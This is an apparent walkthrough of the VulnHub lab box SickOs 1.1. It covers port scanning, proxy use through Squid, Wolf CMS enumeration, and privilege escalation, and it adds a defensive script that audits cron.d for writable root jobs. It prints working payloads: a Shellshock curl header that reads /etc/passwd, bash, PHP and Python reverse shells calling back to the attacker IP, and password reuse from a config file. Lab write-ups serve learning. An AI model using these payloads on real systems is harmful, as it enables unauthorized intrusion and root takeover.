【攻略鴨】SickOs 1.1 VulnHub Box Walkthrough

The content of this article is purely fictional. 攻略鴨 asks for your follows and likes for support!
Attacking machine IP address: 192.168.31.167
External information gathering
Obtaining the target address
$ sudo arp-scan -l
192.168.31.147
Port scan
Nmap results:
22/tcp   open  ssh         syn-ack ttl 64 OpenSSH 5.9p1 Debian 5ubuntu1.1
3128/tcp open  http-proxy  syn-ack ttl 64 Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
Squid
msf6 > search squid
msf6 > use auxiliary/scanner/http/squid_pivot_scanning
> set RPORT 3128
> set RHOSTS 192.168.0.10
> set RANGE 192.168.0.10
msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
[+] [192.168.0.10] 192.168.0.10 is alive.
[+] [192.168.0.10] 192.168.0.10:80 seems open (HTTP 200, server header: 'Apache/2.2.22 (Ubuntu)').
[-] [192.168.0.10] 192.168.0.10:443 unknown Squid proxy error: 'ERR_UNSUP_REQ 0' (HTTP 501)
Set the HTTP proxy in the browser
HTTP Proxy 192.168.31.147 3128
and make sure localhost and 127.0.0.1 are also sent through the proxy
or
configure Burp with an upstream proxy
or
set it system-wide: export http_proxy="http://192.168.31.147:3128" (works for part of ffuf, works for cURL; did not take effect for nmap, nikto, or the browser)
http://192.168.31.147/ can now be reached
Directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.147/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128
or
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128
Results:
connect      [Status: 200,
index        [Status: 200,
index.php    [Status: 200,
robots.txt   [Status: 200,
robots       [Status: 200,
/cgi-bin/    403
robots.txt:
User-agent: *
Disallow: /
Dissalow: /wolfcms
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost/cgi-bin/FUZZ -e .php,.txt,.html -c -ic -x http://192.168.31.147:3128
status       [Status: 200,
Wolf CMS
Visiting http://192.168.31.147/wolfcms/ shows a blog
Articles are "Posted by Administrator"
$ searchsploit wolfcms
Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting   | php/webapps/18652.txt
WolfCMS 0.8.3.1 - Cross-Site Request Forgery                       | php/webapps/44418.txt
WolfCMS 0.8.3.1 - Open Redirection                                 | php/webapps/44421.txt
$ searchsploit wolf
Wolf CMS - Arbitrary File Upload / Execution                       | php/webapps/38000.txt
Wolf CMS 0.6.0b - Multiple Vulnerabilities                         | php/webapps/15614.html
Wolf CMS 0.7.5 - Multiple Vulnerabilities                          | php/webapps/18545.txt
Wolf CMS 0.8.2 - Arbitrary File Upload                             | php/webapps/36818.php
Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)                | php/remote/40004.rb
$ searchsploit -m 44421
http://192.168.31.147/wolfcms/?/admin/login
$ searchsploit -m 38000
http://192.168.31.147/wolfcms/?/admin/plugin/file_manager/browse/
Exploitation
1. Shellshock
Verification:
$ curl -H "user-agent: () { : ;};echo;echo;/bin/bash -c 'cat /etc/passwd'" http://192.168.31.147/cgi-bin/status -x http://192.168.31.147:3128
root:x:0:0:root:/root:/bin/bash
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
Getting a shell:
nc -nvlp 1233
curl -H "user-agent: () { : ;};echo;echo;/bin/bash -i &>/dev/tcp/192.168.31.167/1233 <&1" http://192.168.31.147/cgi-bin/status -x http://192.168.31.147:3128
2. Weak-password login to Wolf CMS and upload of a PHP reverse shell
Log in with the weak credentials admin:admin:
Wolf CMS 0.8.2
Name: Administrator
Username: admin
Upload the PHP reverse shell:
Click the Files tab, create php-reverse-shell as s.php under the /wolfcms/public/ directory, then click the permissions and change them to 777
$ nc -nvlp 1234
$ nc -nvlp 2345
Visit: http://192.168.31.147/wolfcms/public/s.php
$ whoami
www-data
$ bash -c "bash -i >& /dev/tcp/192.168.31.167/2345 0>&1"
Privilege escalation
$ python -c 'import pty; pty.spawn("/bin/bash")'
1. Password reuse and sudo privilege escalation
/var/www/wolfcms/config.php:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
Password reuse:
$ su sickos
Password: john@123
sudo privilege escalation:
$ sudo -l
? ?(ALL : ALL) ALL
sickos@SickOs:~$ sudo su
root@SickOs:~#
2. Scheduled task with a writable Python file
www-data@SickOs:/var/www$ ls -al
-rwxrwxrwx ?1 root ? ?root ? ?109 Dec ?5 ?2015 connect.py
$ cat connect.py
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
$ ls -alhR /etc/cron*
/etc/cron.d:
-rw-r--r-- ?1 root root ?102 Jun 20 ?2012 .placeholder
-rw-r--r-- ?1 root root ? 52 Dec ?5 ?2015 automate
-rw-r--r-- ?1 root root ?544 Jul ?2 ?2015 php5
$ cat /etc/cron.d/automate
* * * * * root /usr/bin/python /var/www/connect.py
Change the contents of connect.py to:
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.31.167",1222))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
# id
uid=0(root) gid=0(root) groups=0(root)
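The escalation above works only because a root cron job executes a file that any user can modify. The following audit script is an added example, not part of this walkthrough: it parses /etc/cron.d style entries and flags root jobs whose absolute-path arguments are group- or world-writable. The cron line and the temp-directory layout in demo() are constructed to mirror the box (automate running /var/www/connect.py with mode 777); the path remapping exists only so the demo runs offline.

```python
import os
import stat
import tempfile

# Constructed sample: the /etc/cron.d/automate entry seen on the box.
SAMPLE_CRON = "* * * * * root /usr/bin/python /var/www/connect.py\n"


def parse_cron_d_line(line):
    """Return (user, argv) for a cron.d line; None for blank, comment and VAR=value lines."""
    fields = line.split()
    if not fields or fields[0].startswith("#") or "=" in fields[0]:
        return None
    if fields[0].startswith("@"):  # @reboot / @hourly use a single schedule field
        return (fields[1], fields[2:]) if len(fields) >= 3 else None
    return (fields[5], fields[6:]) if len(fields) >= 7 else None


def writable_by_others(path):
    """True if the group or world write bit is set (the box had 0777 on connect.py)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron_d(cron_dir, resolve=lambda p: p):
    """List (cron file, path) pairs where a root job runs an absolute-path argument
    that other users can modify. `resolve` remaps paths for the offline demo only."""
    findings = []
    for name in sorted(os.listdir(cron_dir)):
        with open(os.path.join(cron_dir, name)) as fh:
            for line in fh:
                parsed = parse_cron_d_line(line)
                if parsed is None or parsed[0] != "root":
                    continue
                for arg in parsed[1]:
                    real = resolve(arg)
                    if arg.startswith("/") and os.path.isfile(real) and writable_by_others(real):
                        findings.append((name, arg))
    return findings


def demo(script_mode):
    """Rebuild cron.d/automate and /var/www/connect.py in a temp dir with the given
    mode, then audit it: 0o777 reproduces the box, 0o644 is the remediated state."""
    base = tempfile.mkdtemp()
    cron_d, www = os.path.join(base, "cron.d"), os.path.join(base, "www")
    for d in (cron_d, www):
        os.makedirs(d)
    with open(os.path.join(cron_d, "automate"), "w") as fh:
        fh.write(SAMPLE_CRON)
    script = os.path.join(www, "connect.py")
    with open(script, "w") as fh:
        fh.write("#!/usr/bin/python\nprint('placeholder')\n")
    os.chmod(script, script_mode)  # the box's -rwxrwxrwx is the defect being detected
    return audit_cron_d(cron_d, lambda p: p.replace("/var/www", www, 1))
```

On a real host, call audit_cron_d("/etc/cron.d") with the default resolve; an empty list means no root job points at a file other users can rewrite, which is the fix (chmod 644 and root ownership on connect.py).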
Other
Flag
# cat a*
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying
Question / request for help
I have not fully understood the proxy configuration. Could anyone explain how to configure a proxychains proxy for this box?